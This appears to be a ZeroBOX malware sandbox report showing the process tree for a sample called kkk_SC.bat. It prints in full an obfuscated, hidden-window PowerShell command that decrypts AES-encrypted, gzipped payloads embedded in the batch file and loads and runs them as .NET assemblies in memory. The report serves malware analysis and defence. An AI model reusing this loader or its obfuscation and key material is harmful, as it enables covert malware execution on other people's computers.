popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "CWbgsja" C:\Users\test22\AppData\Local\Temp\kkk_SC.bat

    3044

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat

      2192

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\kkk_SC.bat

        2256

        • kkk_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\kkk_SC.bat.exe" -w hidden -c $cWVj='EFSeJleFSeJmenFSeJtAFSeJtFSeJ'.Replace('FSeJ', '');$dZIP='CFSeJhFSeJangeFSeJExtFSeJenFSeJsioFSeJnFSeJ'.Replace('FSeJ', '');$SOzw='MaiFSeJnMoFSeJdFSeJuleFSeJ'.Replace('FSeJ', '');$iDET='LoFSeJaFSeJdFSeJ'.Replace('FSeJ', '');$CeaB='InvoFSeJkeFSeJ'.Replace('FSeJ', '');$bcLs='ReFSeJaFSeJdLiFSeJnesFSeJ'.Replace('FSeJ', '');$TFdr='EnFSeJtrFSeJyFSeJPoFSeJinFSeJtFSeJ'.Replace('FSeJ', '');$gkqN='TrFSeJaFSeJnsfoFSeJrFSeJmFinFSeJalBFSeJlFSeJocFSeJkFSeJ'.Replace('FSeJ', '');$bRfw='CreFSeJaFSeJtFSeJeFSeJDecrFSeJyFSeJptFSeJorFSeJ'.Replace('FSeJ', '');$UlBT='GetFSeJCuFSeJrreFSeJnFSeJtPFSeJroFSeJceFSeJssFSeJ'.Replace('FSeJ', '');$QNKP='FroFSeJmBFSeJasFSeJe6FSeJ4FSeJStrFSeJinFSeJgFSeJ'.Replace('FSeJ', '');$jAZR='SplFSeJitFSeJ'.Replace('FSeJ', '');function cPniz($bJbiy){$IQAHT=[System.Security.Cryptography.Aes]::Create();$IQAHT.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IQAHT.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IQAHT.Key=[System.Convert]::$QNKP('DG+ITvejSg5kAhhFMXGE41iyJquRkqJTsUyn5dcEHDA=');$IQAHT.IV=[System.Convert]::$QNKP('Joz0fUDJtUUf4xJ0M3JntQ==');$fKHZo=$IQAHT.$bRfw();$lpOTx=$fKHZo.$gkqN($bJbiy,0,$bJbiy.Length);$fKHZo.Dispose();$IQAHT.Dispose();$lpOTx;}function eyRdW($bJbiy){$OKYGT=New-Object System.IO.MemoryStream(,$bJbiy);$pEfSh=New-Object System.IO.MemoryStream;$cJnlK=New-Object System.IO.Compression.GZipStream($OKYGT,[IO.Compression.CompressionMode]::Decompress);$cJnlK.CopyTo($pEfSh);$cJnlK.Dispose();$OKYGT.Dispose();$pEfSh.Dispose();$pEfSh.ToArray();}$cqDqM=[System.Linq.Enumerable]::$cWVj([System.IO.File]::$bcLs([System.IO.Path]::$dZIP([System.Diagnostics.Process]::$UlBT().$SOzw.FileName, $null)), 1);$DZZNX=$cqDqM.Substring(2).$jAZR(':');$OIVsl=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[0])));$VMVnP=eyRdW (cPniz ([Convert]::$QNKP($DZZNX[1])));[System.Reflection.Assembly]::$iDET([byte[]]$VMVnP).$TFdr.$CeaB($null,$null);[System.Reflection.Assembly]::$iDET([byte[]]$OIVsl).$TFdr.$CeaB($null,$null);

          2432

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf